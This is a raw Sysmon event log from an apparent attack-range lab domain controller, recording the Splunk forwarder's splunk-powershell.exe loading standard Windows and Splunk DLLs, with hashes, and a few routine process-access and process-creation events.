CorporationWKSCLI.DLLMD5=3D375474E2FE9A77D243E35954287188,SHA256=7850F11166D7CACED6F628033524ED86191AE92772000AFA677E59A664396E8C,IMPHASH=6990BA83B94C81786A84E6C44E699D03trueMicrosoft WindowsValid 734700x800000000000000098760Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923,IMPHASH=7D1B32891B9173ED71ED6C18DEFEE578trueMicrosoft WindowsValid 734700x800000000000000098759Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.046{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\netapi32.dll10.0.14393.5125 (rs1_release.220429-1732)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=E8FF656B90334BED915B2BC6BBE57C9A,SHA256=8BB399AD98B9D9C637D09EB48306B1E80C50BAA7D1C9811595D9042E4294173C,IMPHASH=FE007B4B6CED5075C98434207FFF87E0trueMicrosoft WindowsValid 734700x800000000000000098758Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FF,IMPHASH=ADF99B9EA3A1F76C33522F96772BC4DDtrueMicrosoft CorporationValid 734700x800000000000000098757Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5,IMPHASH=5B59892514923CABE9B70CFE22A3F59AtrueMicrosoft WindowsValid 734700x800000000000000098756Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75E,IMPHASH=8987D71C85BB2C13D3D90194331F962FtrueMicrosoft WindowsValid 734700x800000000000000098755Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FAD,IMPHASH=BA5C37A1CF8C2730ED1F4DA1587496A5trueMicrosoft WindowsValid 734700x800000000000000098754Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\combase.dll10.0.14393.5125 (rs1_release.220429-1732)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=D63E9AB9C67A611B947527D96B81B44D,SHA256=0F050418ED9A8C0F879636B1B25AF9C651966FE75B8EFAD76F2AD73BB0AD54BC,IMPHASH=0863DD72CA0C3702DB7ACD19A4D5DEB1trueMicrosoft WindowsValid 734700x800000000000000098753Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098752Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\Wldap32.dll10.0.14393.5125 (rs1_release.220429-1732)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=5760D3C7E030C7F1984753F6050BF4DA,SHA256=DCB422305A2B3160F8FD53B3F3841B1EE80E4D81D2599FA02CEA9BBC5E5E2834,IMPHASH=D13722FCCB1CDD38974ADB7277D98799trueMicrosoft WindowsValid 734700x800000000000000098751Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32full.dll10.0.14393.5125 (rs1_release.220429-1732)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=BA612E99251C829D7E20073F81A02617,SHA256=9BCFD0E0857596C5F0F7596B6A4A9207684617D8333EEAE9BC482AE1802752D9,IMPHASH=059EB3BAA45E35C79FAE66F7279059EEtrueMicrosoft WindowsValid 734700x800000000000000098750Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=3858DC319832992A738C12330E3E579C,SHA256=DEDE14211FCAE7CB5500730B35BABFEAC1F0D207A248D8B6418D2EEF8F348716,IMPHASH=9724475F92787AFC45A3BA458C0DCDC5trueMicrosoft WindowsValid 734700x800000000000000098749Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54,IMPHASH=AFF2E9AF6DD20912DC1E604BDBCA3761trueMicrosoft WindowsValid 734700x800000000000000098748Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3,IMPHASH=070F257E4632BC576557C4085595EAA4trueMicrosoft WindowsValid 734700x800000000000000098747Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8,IMPHASH=A24D446CB7FCBB6D29B592603C0BE00CtrueMicrosoft WindowsValid 734700x800000000000000098746Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0,IMPHASH=76A5AA3DF6083D853F576403C8F841A8trueMicrosoft WindowsValid 734700x800000000000000098745Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9,IMPHASH=2CB5DA5225E972A08F32D04B8085DC7EtrueMicrosoft CorporationValid 734700x800000000000000098744Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=AD564ED89D67D88709AA5980BAE20604,SHA256=0EEBE5AA750667908006742E133AE1C273D966897B95B1A0E63826450BB4780A,IMPHASH=A48DFE6DD98128BE3EB687CBF2724A44trueSplunk, Inc.Valid 734700x800000000000000098743Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=B28B29D2F85EB8349BFB5E7214D7F4D5,SHA256=17260ACBE55D8988E598ECEFBC60140EBE057336B47D8089444588321F067280,IMPHASH=838F909F0A52D977E0B8662364FA0BFEtrueSplunk, Inc.Valid 734700x800000000000000098742Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5125 (rs1_release.220429-1732)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=E22D365A75901B1AED4B2A329FC3B5EC,SHA256=70073F203292301E5B6854DED0F9150B97F2E81A2E12FF40C81E978382B8D2CB,IMPHASH=154EA5DE40F0F2475E943DE8013E5692trueMicrosoft WindowsValid 734700x800000000000000098741Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=98C643DECFE1971BE3E8B076B19BFD72,SHA256=A520C20F316C902985449BC17AB5F86FCF2F41420B08C1AE08BA06E767EB49F3,IMPHASH=464BF3FDF330E6A15D24CC679EF7F72EtrueSplunk, Inc.Valid 734700x800000000000000098740Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=9BC99DECE580BD163AC318FCD1ACB667,SHA256=94BA08021E14476ED8EC2DC81165574B64274E20F2D8DE9CA98CD0D10CE279F7,IMPHASH=3295DC2518E43BEF226F8847873D20C2trueSplunk, Inc.Valid 734700x800000000000000098739Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2zaOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=0FE6D3D4B3F4B0F5502371832D12BB8E,SHA256=3DF79909021C72E70D2AE273587296E5E2D5F77315011B5C3115CFA359682647,IMPHASH=E09B42A7EA1725DA2CD99223AD969C63trueSplunk, Inc.Valid 734700x800000000000000098738Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166,IMPHASH=D6E06125849E8565A50F366A0149FB40trueMicrosoft WindowsValid 734700x800000000000000098737Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3,IMPHASH=57ABD1FDE351971A01E912069E11B44CtrueMicrosoft WindowsValid 734700x800000000000000098736Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4,IMPHASH=07D6F84E3C8FD0D2C32F9398A0369BAFtrueMicrosoft WindowsValid 734700x800000000000000098735Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438,IMPHASH=C7DF3F2CF025F0BEDA797705E4F4AFBBtrueMicrosoft WindowsValid 734700x800000000000000098734Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=FBA0D04D5A8AEA25D86EC623A14D0056,SHA256=D64FE508393C40160D1EFB22149C69763CBAA921BD1BC74C8D4AE59A10C3B767,IMPHASH=987AB6B8B03EE421D8CC59EAFE452916trueSplunk, Inc.Valid 734700x800000000000000098733Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.10libxml2 librarylibxml2-libxml2.dllMD5=20596DB2126E9F188727597F0FCC7CDB,SHA256=BAD6246A2B43B07FE80643DE40B0CE49751C8E0B95B076AD94E59F16CE8D8C0C,IMPHASH=6DA659461618DB73B9BD17D114677D20trueSplunk, Inc.Valid 734700x800000000000000098732Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAE,IMPHASH=B511E4B82A44D3731CDA46A74F5D57EAtrueMicrosoft WindowsValid 10341000x800000000000000098731Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A44C-6294-0901-000000005502}53725392C:\Windows\system32\conhost.exe{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 734700x800000000000000098730Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\KernelBase.dll10.0.14393.5125 (rs1_release.220429-1732)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=D8F18C830B03B0D60C10093ECB020E60,SHA256=CF0D33CEC46BB41C6F5693A84491ACD7F7CBECB429BA6C47AB5A170D4DF3484F,IMPHASH=05349EBAA635D77714868763D44881E9trueMicrosoft WindowsValid 734700x800000000000000098729Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\kernel32.dll10.0.14393.5066 (rs1_release.220401-1841)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=E258A076D1B87D41F724E431B3293BA5,SHA256=0670462AC0932F314B2E4A0A20B4B6F96C024C2310BD2AF21B20BF7A8EC9FF8E,IMPHASH=3CE0779E0F4E275CD51A359A98CCC682trueMicrosoft WindowsValid 734700x800000000000000098728Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Windows\System32\ntdll.dll10.0.14393.5006 (rs1_release.220301-1704)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=F5EE39B17A8BCDEDC3D40997C26F62B1,SHA256=11C1C88B1CC11D9800DEEF27ED7ABDFDE3DC852687A3B9FBD5153284106E5952,IMPHASH=00000000000000000000000000000000trueMicrosoft WindowsValid 734700x800000000000000098727Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exeC:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----MD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9trueSplunk, Inc.Valid 10341000x800000000000000098726Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098725Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098724Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098723Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A254-6294-0C00-000000005502}8482056C:\Windows\system32\svchost.exe{326FD73D-A262-6294-2700-000000005502}2872C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000098722Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A252-6294-0500-000000005502}4161908C:\Windows\system32\csrss.exe{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000098721Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-A44C-6294-0501-000000005502}51646008C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000098720Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:03:49.031{326FD73D-C0B5-6294-320B-000000005502}4220C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 